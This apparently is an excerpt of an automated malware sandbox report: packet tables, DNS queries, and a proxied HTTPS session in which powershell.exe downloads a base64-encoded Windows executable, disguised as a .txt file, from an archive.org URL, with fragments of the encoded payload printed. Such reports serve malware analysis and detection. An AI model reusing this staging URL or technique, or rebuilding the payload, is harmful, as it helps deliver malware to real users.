                                                                  Sep 27, 2024 10:43:58.993699074 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:58.993716002 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:58.993782997 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:58.993792057 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:58.993838072 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:58.996099949 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:58.996118069 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:58.996174097 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:58.996186018 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:58.996221066 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.059848070 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.059870958 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.060028076 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.060055971 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.060100079 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.063664913 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.063699007 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.063744068 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.063771963 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.063791037 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.063812017 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.128093004 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.128114939 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.128269911 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.128294945 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.128339052 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.130273104 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.130287886 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.130352974 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.130362034 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.130403996 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.197109938 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.197129011 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.197238922 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.197264910 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.197308064 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.197449923 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.197465897 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.197561979 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.197567940 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.197607040 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.200920105 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.200936079 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.201003075 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.201009989 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.201051950 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.265913963 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.265930891 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.266202927 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.266228914 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.266273975 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.266450882 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.266464949 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.266527891 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.266535997 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.266571999 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.269793987 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.269809961 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.269884109 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.269905090 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.269948006 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.335547924 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.335566044 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.335731030 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.335752010 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.335796118 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.336769104 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.336783886 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.336848021 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.336862087 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.336910963 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.403902054 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.403973103 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.404019117 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.404036045 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.404058933 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.404077053 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.404285908 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.404299021 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.404366970 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.404372931 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.404412031 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.407182932 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.407227993 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.407263994 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.407275915 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.407306910 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.407329082 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.473184109 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.473201036 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.473258972 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.473270893 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.473316908 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.473694086 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.473707914 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.473754883 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.473763943 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.473839045 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.476284027 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.476298094 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.476393938 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.476409912 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.476444006 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.542396069 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.542418957 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.542565107 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.542583942 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.542623997 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.543149948 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.543200016 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.543211937 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.543224096 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.543247938 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.543265104 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.611417055 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.611437082 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.611552000 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.611569881 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.611610889 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.612083912 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.612138987 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.612154961 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.612163067 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.612198114 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.612198114 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.613296986 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.613351107 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.613363981 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.613372087 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.613408089 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.613418102 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.683260918 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.683310032 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.683362007 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.683396101 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.683413982 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.683437109 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.683449984 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.683485985 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.683491945 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.683527946 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.684226036 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.684241056 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.684281111 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.684292078 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.684310913 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.684334993 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.749042034 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.749061108 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.749134064 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.749140024 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.749152899 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.749216080 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.749217033 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.749242067 CEST44349699207.241.227.240192.168.2.7
                                                                  Sep 27, 2024 10:43:59.749281883 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.751940012 CEST49699443192.168.2.7207.241.227.240
                                                                  Sep 27, 2024 10:43:59.864888906 CEST49700443192.168.2.7172.66.0.235
                                                                  Sep 27, 2024 10:43:59.864923954 CEST44349700172.66.0.235192.168.2.7
                                                                  Sep 27, 2024 10:43:59.864981890 CEST49700443192.168.2.7172.66.0.235
                                                                  Sep 27, 2024 10:43:59.865643978 CEST49700443192.168.2.7172.66.0.235
                                                                  Sep 27, 2024 10:43:59.865653992 CEST44349700172.66.0.235192.168.2.7
                                                                  Sep 27, 2024 10:44:00.332263947 CEST44349700172.66.0.235192.168.2.7
                                                                  Sep 27, 2024 10:44:00.332413912 CEST49700443192.168.2.7172.66.0.235
                                                                  Sep 27, 2024 10:44:00.335762978 CEST49700443192.168.2.7172.66.0.235
                                                                  Sep 27, 2024 10:44:00.335776091 CEST44349700172.66.0.235192.168.2.7
                                                                  Sep 27, 2024 10:44:00.337157011 CEST44349700172.66.0.235192.168.2.7
                                                                  Sep 27, 2024 10:44:00.338479996 CEST49700443192.168.2.7172.66.0.235
                                                                  Sep 27, 2024 10:44:00.379403114 CEST44349700172.66.0.235192.168.2.7
                                                                  Sep 27, 2024 10:44:00.447254896 CEST44349700172.66.0.235192.168.2.7
                                                                  Sep 27, 2024 10:44:00.447307110 CEST44349700172.66.0.235192.168.2.7
                                                                  Sep 27, 2024 10:44:00.447340965 CEST44349700172.66.0.235192.168.2.7
                                                                  Sep 27, 2024 10:44:00.447396994 CEST44349700172.66.0.235192.168.2.7
                                                                  Sep 27, 2024 10:44:00.447427988 CEST49700443192.168.2.7172.66.0.235
                                                                  Sep 27, 2024 10:44:00.447448015 CEST44349700172.66.0.235192.168.2.7
                                                                  Sep 27, 2024 10:44:00.447551966 CEST49700443192.168.2.7172.66.0.235
                                                                  Sep 27, 2024 10:44:00.447628021 CEST44349700172.66.0.235192.168.2.7
                                                                  Sep 27, 2024 10:44:00.447726011 CEST49700443192.168.2.7172.66.0.235
                                                                  Sep 27, 2024 10:44:00.448016882 CEST49700443192.168.2.7172.66.0.235

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Sep 27, 2024 10:43:53.890933037 CEST5303353192.168.2.71.1.1.1
                                                                  Sep 27, 2024 10:43:54.039045095 CEST53530331.1.1.1192.168.2.7
                                                                  Sep 27, 2024 10:43:59.854089975 CEST5868253192.168.2.71.1.1.1
                                                                  Sep 27, 2024 10:43:59.864110947 CEST53586821.1.1.1192.168.2.7

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Sep 27, 2024 10:43:53.890933037 CEST192.168.2.71.1.1.10xccdStandard query (0)ia600100.us.archive.orgA (IP address)IN (0x0001)false
                                                                  Sep 27, 2024 10:43:59.854089975 CEST192.168.2.71.1.1.10xaadbStandard query (0)pub-6346c84860d5480393a1799fb277dfdc.r2.devA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Sep 27, 2024 10:43:54.039045095 CEST1.1.1.1192.168.2.70xccdNo error (0)ia600100.us.archive.org207.241.227.240A (IP address)IN (0x0001)false
                                                                  Sep 27, 2024 10:43:59.864110947 CEST1.1.1.1192.168.2.70xaadbNo error (0)pub-6346c84860d5480393a1799fb277dfdc.r2.dev172.66.0.235A (IP address)IN (0x0001)false
                                                                  Sep 27, 2024 10:43:59.864110947 CEST1.1.1.1192.168.2.70xaadbNo error (0)pub-6346c84860d5480393a1799fb277dfdc.r2.dev162.159.140.237A (IP address)IN (0x0001)false

                                                                  HTTP Request Dependency Graph

                                                                  • ia600100.us.archive.org
                                                                  • pub-6346c84860d5480393a1799fb277dfdc.r2.dev

                                                                  HTTPS Proxied Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.749699207.241.227.2404435220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-09-27 08:43:54 UTC109OUTGET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1
                                                                  Host: ia600100.us.archive.org
                                                                  Connection: Keep-Alive
                                                                  2024-09-27 08:43:54 UTC606INHTTP/1.1 200 OK
                                                                  Server: nginx/1.24.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 08:43:54 GMT
                                                                  Content-Type: text/plain; charset=utf-8
                                                                  Content-Length: 2823512
                                                                  Last-Modified: Wed, 11 Sep 2024 23:50:18 GMT
                                                                  Connection: close
                                                                  ETag: "66e22cba-2b1558"
                                                                  Strict-Transport-Security: max-age=15724800
                                                                  Expires: Fri, 27 Sep 2024 14:43:54 GMT
                                                                  Cache-Control: max-age=21600
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                                  Access-Control-Allow-Credentials: true
                                                                  Accept-Ranges: bytes
                                                                  2024-09-27 08:43:54 UTC15778INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 42 6f 43 42 62 6f 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 45 59 67 41 41 41 49 41 41 41 41 41 41 41 41 76 6d 55 67 41 41 41 67 41 41 41 41 67 43 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                                  Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABoCBboAAAAAAAAAAOAADiELATAAAEYgAAAIAAAAAAAAvmUgAAAgAAAAgCAAAABAAAAgAAAAAgA
                                                                  2024-09-27 08:43:55 UTC16384INData Raw: 41 41 41 50 34 4d 45 77 42 46 41 67 41 41 41 41 55 41 41 41 41 31 41 41 41 41 4f 41 41 41 41 41 41 41 45 51 4d 52 46 78 45 49 63 35 73 46 41 41 5a 76 63 51 41 41 43 69 41 42 41 41 41 41 66 73 55 49 41 41 52 37 42 51 6b 41 42 44 6e 4a 2f 2f 2f 2f 4a 69 41 41 41 41 41 41 4f 4c 37 2f 2f 2f 38 41 41 4e 30 66 41 41 41 41 49 41 49 41 41 41 42 2b 78 51 67 41 42 48 73 53 43 51 41 45 4f 73 6e 36 2f 2f 38 6d 49 41 41 41 41 41 41 34 76 76 72 2f 2f 78 45 44 62 79 73 41 41 41 6f 57 50 6f 38 41 41 41 41 67 41 51 41 41 41 48 37 46 43 41 41 45 65 77 73 4a 41 41 51 36 6e 66 72 2f 2f 79 59 67 41 51 41 41 41 44 69 53 2b 76 2f 2f 45 67 63 6f 63 41 41 41 43 68 4d 49 49 41 55 41 41 41 42 2b 78 51 67 41 42 48 76 30 43 41 41 45 4f 6e 58 36 2f 2f 38 6d 49 41 59 41 41 41 41 34 61
                                                                  Data Ascii: AAAP4MEwBFAgAAAAUAAAA1AAAAOAAAAAAAEQMRFxEIc5sFAAZvcQAACiABAAAAfsUIAAR7BQkABDnJ////JiAAAAAAOL7///8AAN0fAAAAIAIAAAB+xQgABHsSCQAEOsn6//8mIAAAAAA4vvr//xEDbysAAAoWPo8AAAAgAQAAAH7FCAAEewsJAAQ6nfr//yYgAQAAADiS+v//EgcocAAAChMIIAUAAAB+xQgABHv0CAAEOnX6//8mIAYAAAA4a
                                                                  2024-09-27 08:43:55 UTC16384INData Raw: 2f 2f 2f 77 41 52 42 47 39 49 49 77 41 47 62 33 51 41 41 41 6f 54 42 53 41 46 41 41 41 41 4f 44 48 2f 2f 2f 38 41 4f 4e 73 41 41 41 41 67 43 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 4d 41 45 55 67 41 41 41 41 4f 51 49 41 41 47 34 43 41 41 42 61 41 51 41 41 66 51 41 41 41 4d 73 43 41 41 43 4d 41 51 41 41 46 41 45 41 41 4a 77 44 41 41 43 55 41 41 41 41 41 51 4d 41 41 4c 77 41 41 41 41 57 41 41 41 41 33 41 49 41 41 4d 63 42 41 41 43 6a 41 51 41 41 53 67 49 41 41 41 55 41 41 41 43 62 41 67 41 41 58 67 41 41 41 49 45 42 41 41 41 38 41 51 41 41 61 77 45 41 41 42 30 44 41 41 44 38 41 41 41 41 66 77 49 41 41 4f 30 42 41 41 44 68 41 41 41 41 53 77 45 41 41 44 51 41 41 41 42 46 41 41 41 41 49 51 41 41 41 42 4d 43 41 41 41 34 4e 41 49 41 41 42 45 49 4f 6a 30 44 41
                                                                  Data Ascii: ///wARBG9IIwAGb3QAAAoTBSAFAAAAODH///8AONsAAAAgCAAAADgEAAAA/gwMAEUgAAAAOQIAAG4CAABaAQAAfQAAAMsCAACMAQAAFAEAAJwDAACUAAAAAQMAALwAAAAWAAAA3AIAAMcBAACjAQAASgIAAAUAAACbAgAAXgAAAIEBAAA8AQAAawEAAB0DAAD8AAAAfwIAAO0BAADhAAAASwEAADQAAABFAAAAIQAAABMCAAA4NAIAABEIOj0DA
                                                                  2024-09-27 08:43:55 UTC16384INData Raw: 38 52 43 53 68 31 41 67 41 47 62 7a 49 6a 41 41 59 52 43 57 2f 47 49 67 41 47 4b 48 59 43 41 41 5a 76 4d 69 4d 41 42 69 68 30 41 67 41 47 45 77 38 67 43 51 41 41 41 48 37 46 43 41 41 45 65 38 49 49 41 41 51 36 7a 50 37 2f 2f 79 59 67 44 51 41 41 41 44 6a 42 2f 76 2f 2f 45 51 49 54 41 79 41 49 41 41 41 41 2f 67 34 4b 41 44 69 72 2f 76 2f 2f 4f 42 73 42 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 37 4d 49 41 41 51 36 6c 76 37 2f 2f 79 59 67 41 41 41 41 41 44 69 4c 2f 76 2f 2f 45 51 45 67 70 30 47 63 33 79 41 44 41 41 41 41 59 79 42 63 44 35 4f 49 59 58 37 46 43 41 41 45 65 38 51 49 41 41 52 68 4b 46 51 43 41 41 59 6f 59 77 49 41 42 68 4d 43 49 42 34 41 41 41 41 34 56 2f 37 2f 2f 78 45 48 4f 6c 6f 42 41 41 41 67 43 67 41 41 41 48 37 46 43 41 41 45 65
                                                                  Data Ascii: 8RCSh1AgAGbzIjAAYRCW/GIgAGKHYCAAZvMiMABih0AgAGEw8gCQAAAH7FCAAEe8IIAAQ6zP7//yYgDQAAADjB/v//EQITAyAIAAAA/g4KADir/v//OBsBAAAgAAAAAH7FCAAEe7MIAAQ6lv7//yYgAAAAADiL/v//EQEgp0Gc3yADAAAAYyBcD5OIYX7FCAAEe8QIAARhKFQCAAYoYwIABhMCIB4AAAA4V/7//xEHOloBAAAgCgAAAH7FCAAEe
                                                                  2024-09-27 08:43:55 UTC16384INData Raw: 41 41 4f 4d 37 38 2f 2f 38 52 41 54 6b 71 2f 66 2f 2f 49 41 63 41 41 41 42 2b 78 51 67 41 42 48 76 6b 43 41 41 45 4f 72 50 38 2f 2f 38 6d 49 41 49 41 41 41 41 34 71 50 7a 2f 2f 77 41 41 41 52 41 41 41 41 49 41 71 77 44 35 70 41 46 33 41 41 41 41 41 43 5a 2b 6f 51 41 41 42 42 54 2b 41 53 6f 41 41 42 70 2b 6f 51 41 41 42 43 6f 41 4b 76 34 4a 41 41 42 76 5a 51 41 41 43 69 6f 41 4b 76 34 4a 41 41 42 76 54 51 41 41 43 69 6f 41 4c 67 44 2b 43 51 41 41 4b 50 77 6c 41 41 59 71 4c 67 44 2b 43 51 41 41 4b 4c 45 45 41 41 59 71 4b 76 34 4a 41 41 42 76 2b 51 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 2b 41 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 45 43 4d 41 42 69 6f 41 4c 67 44 2b 43 51 41 41 4b 43 55 42 41 41 6f 71 48 67 41 6f 73 41 51 41 42 69 70 4b 2f 67 6b 41 41
                                                                  Data Ascii: AAOM78//8RATkq/f//IAcAAAB+xQgABHvkCAAEOrP8//8mIAIAAAA4qPz//wAAARAAAAIAqwD5pAF3AAAAACZ+oQAABBT+ASoAABp+oQAABCoAKv4JAABvZQAACioAKv4JAABvTQAACioALgD+CQAAKPwlAAYqLgD+CQAAKLEEAAYqKv4JAABv+QIABioAKv4JAABv+AIABioAKv4JAABvECMABioALgD+CQAAKCUBAAoqHgAosAQABipK/gkAA
                                                                  2024-09-27 08:43:55 UTC16384INData Raw: 6f 49 41 41 51 36 59 50 2f 2f 2f 79 59 67 43 41 41 41 41 44 68 56 2f 2f 2f 2f 4f 47 30 41 41 41 41 67 42 77 41 41 41 48 37 46 43 41 41 45 65 37 67 49 41 41 51 36 50 50 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 78 2f 2f 2f 2f 41 41 49 6f 43 77 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 75 67 67 41 42 44 6b 57 2f 2f 2f 2f 4a 69 41 42 41 41 41 41 4f 41 76 2f 2f 2f 38 41 49 49 66 62 73 78 73 67 6d 4f 66 75 4f 6c 67 67 64 4f 74 35 55 57 46 2b 78 51 67 41 42 48 73 43 43 51 41 45 59 53 67 37 41 77 41 47 4b 44 77 44 41 41 5a 36 42 47 39 67 41 41 41 4b 46 79 68 76 41 77 41 47 45 77 49 67 42 67 41 41 41 48 37 46 43 41 41 45 65 37 30 49 41 41 51 36 77 66 37 2f 2f 79 59 67 43 51 41 41 41 44 69 32 2f 76 2f 2f 41 41 51 55 2f 67 45 54 41 53 41 44 41 41 41 41 4f
                                                                  Data Ascii: oIAAQ6YP///yYgCAAAADhV////OG0AAAAgBwAAAH7FCAAEe7gIAAQ6PP///yYgBAAAADgx////AAIoCwMABiACAAAAfsUIAAR7uggABDkW////JiABAAAAOAv///8AIIfbsxsgmOfuOlggdOt5UWF+xQgABHsCCQAEYSg7AwAGKDwDAAZ6BG9gAAAKFyhvAwAGEwIgBgAAAH7FCAAEe70IAAQ6wf7//yYgCQAAADi2/v//AAQU/gETASADAAAAO
